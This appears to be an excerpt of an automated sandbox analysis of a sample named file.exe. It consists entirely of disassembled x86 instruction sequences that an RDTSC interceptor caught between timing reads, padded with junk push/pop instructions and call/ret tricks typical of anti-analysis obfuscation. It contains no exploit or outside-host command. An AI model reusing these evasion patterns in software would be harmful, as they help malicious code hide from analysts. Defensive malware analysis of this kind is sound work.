Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E57 second address: 1793EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F3650BE6D78h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F3650BE6D87h 0x00000028 push 00000003h 0x0000002a clc 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F3650BE6D78h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 or dword ptr [ebp+122D1C7Ah], ecx 0x0000004d push 00000003h 0x0000004f mov ecx, 4AC11F31h 0x00000054 call 00007F3650BE6D79h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F3650BE6D82h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793EEA second address: 1793F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3650C99DA0h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F3650C99D9Dh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793F19 second address: 1793F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793F1F second address: 1793F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793F33 second address: 1793F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793F37 second address: 1793F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007F3650C99D9Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 ja 00007F3650C99D98h 0x0000001b pop eax 0x0000001c pop eax 0x0000001d mov ecx, 69096950h 0x00000022 lea ebx, dword ptr [ebp+1244AB30h] 0x00000028 adc dl, FFFFFF8Dh 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3650C99D9Fh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793F7E second address: 1793FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3650BE6D85h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1794062 second address: 179407A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3650C99DA0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 179414C second address: 1794151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17A6E3A second address: 17A6E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17A6E48 second address: 17A6E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17A6E4C second address: 17A6E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17A6E50 second address: 17A6E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17A6E56 second address: 17A6E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99D9Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17843C3 second address: 17843D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D81h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17843D8 second address: 17843DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17843DE second address: 1784405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3650BE6D7Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B34BD second address: 17B34D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B378D second address: 17B3793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B3793 second address: 17B37B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA8h 0x00000007 je 00007F3650C99DA2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B37B5 second address: 17B37CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3650BE6D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F3650BE6D78h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B38FF second address: 17B390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B3CEA second address: 17B3CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B3CF0 second address: 17B3CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B3E8B second address: 17B3E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B3E91 second address: 17B3E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B3E97 second address: 17B3EE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3650BE6D8Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 jmp 00007F3650BE6D7Ah 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 jmp 00007F3650BE6D7Ch 0x0000001d pushad 0x0000001e je 00007F3650BE6D76h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4153 second address: 17B416F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3650C99DA7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B416F second address: 17B4175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4175 second address: 17B417B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17878F2 second address: 17878F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4BEB second address: 17B4BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 jl 00007F3650C99DBEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4BFB second address: 17B4BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4BFF second address: 17B4C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4D74 second address: 17B4D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F3650BE6D76h 0x00000009 je 00007F3650BE6D76h 0x0000000f popad 0x00000010 pushad 0x00000011 jl 00007F3650BE6D76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4D8D second address: 17B4D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4ED0 second address: 17B4EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jg 00007F3650BE6D78h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3650BE6D88h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4EFD second address: 17B4F1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F3650C99D96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4F1B second address: 17B4F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B4F1F second address: 17B4F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3650C99D9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B51D3 second address: 17B51E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B7D61 second address: 17B7D8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3650C99DA0h 0x00000008 jmp 00007F3650C99D9Eh 0x0000000d pop esi 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17B7D8A second address: 17B7D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD0CC second address: 17BD0EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3650C99D9Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD0EA second address: 17BD0F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3650BE6D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD3B3 second address: 17BD3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BD3B7 second address: 17BD3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C124E second address: 17C1252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C1252 second address: 17C1258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C1258 second address: 17C1277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3650C99D9Ch 0x0000000e jnc 00007F3650C99D96h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177D7A7 second address: 177D7C2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3650BE6D86h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177D7C2 second address: 177D7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177D7CF second address: 177D7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177D7D3 second address: 177D7DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F3650C99D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BB81D second address: 17BB84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D82h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F3650BE6D7Dh 0x00000013 jnc 00007F3650BE6D76h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C3EC0 second address: 17C3EE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3650C99D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F3650C99DA7h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C3FB1 second address: 17C3FF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F3650BE6D81h 0x00000013 jmp 00007F3650BE6D87h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C4107 second address: 17C410B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C41CE second address: 17C41D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C42AA second address: 17C42B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C4826 second address: 17C482B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C4A88 second address: 17C4A92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3650C99D9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C4D1B second address: 17C4D33 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3650BE6D78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F3650BE6D80h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C4D33 second address: 17C4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push eax 0x00000009 call 00007F3650C99D98h 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 add dword ptr [esp+04h], 0000001Ah 0x0000001b inc eax 0x0000001c push eax 0x0000001d ret 0x0000001e pop eax 0x0000001f ret 0x00000020 xchg eax, ebx 0x00000021 push esi 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 popad 0x00000028 pop esi 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F3650C99DA8h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C5304 second address: 17C530A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C5D27 second address: 17C5DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 stc 0x00000009 push 00000000h 0x0000000b mov dword ptr [ebp+122D1D4Dh], eax 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F3650C99D98h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d add dword ptr [ebp+122D1D4Dh], edi 0x00000033 jo 00007F3650C99DACh 0x00000039 jmp 00007F3650C99DA6h 0x0000003e xchg eax, ebx 0x0000003f jo 00007F3650C99DAEh 0x00000045 pushad 0x00000046 jmp 00007F3650C99DA4h 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d popad 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F3650C99DA2h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C78B1 second address: 17C792C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F3650BE6D80h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F3650BE6D78h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 or dword ptr [ebp+122D1FA9h], ebx 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+12447849h], ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F3650BE6D78h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F3650BE6D7Fh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C838A second address: 17C840F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3650C99D98h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D32E2h], edx 0x0000002c call 00007F3650C99DA2h 0x00000031 sbb edi, 1CFED320h 0x00000037 pop edi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F3650C99D98h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov edi, dword ptr [ebp+1245D1C2h] 0x0000005a xchg eax, ebx 0x0000005b jbe 00007F3650C99D9Eh 0x00000061 push esi 0x00000062 jc 00007F3650C99D96h 0x00000068 pop esi 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C8196 second address: 17C819A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C819A second address: 17C81A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C8F9B second address: 17C8F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C81A0 second address: 17C81A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C8F9F second address: 17C8FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CA498 second address: 17CA49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF28C second address: 17CF29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F3650BE6D76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF29A second address: 17CF2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3650C99D96h 0x0000000a je 00007F3650C99D96h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF2AF second address: 17CF2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF88F second address: 17CF893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF893 second address: 17CF899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0767 second address: 17D07C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F3650C99D96h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F3650C99D98h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2092h], ebx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F3650C99D98h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov dword ptr [ebp+124479B0h], ecx 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D07C9 second address: 17D07CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
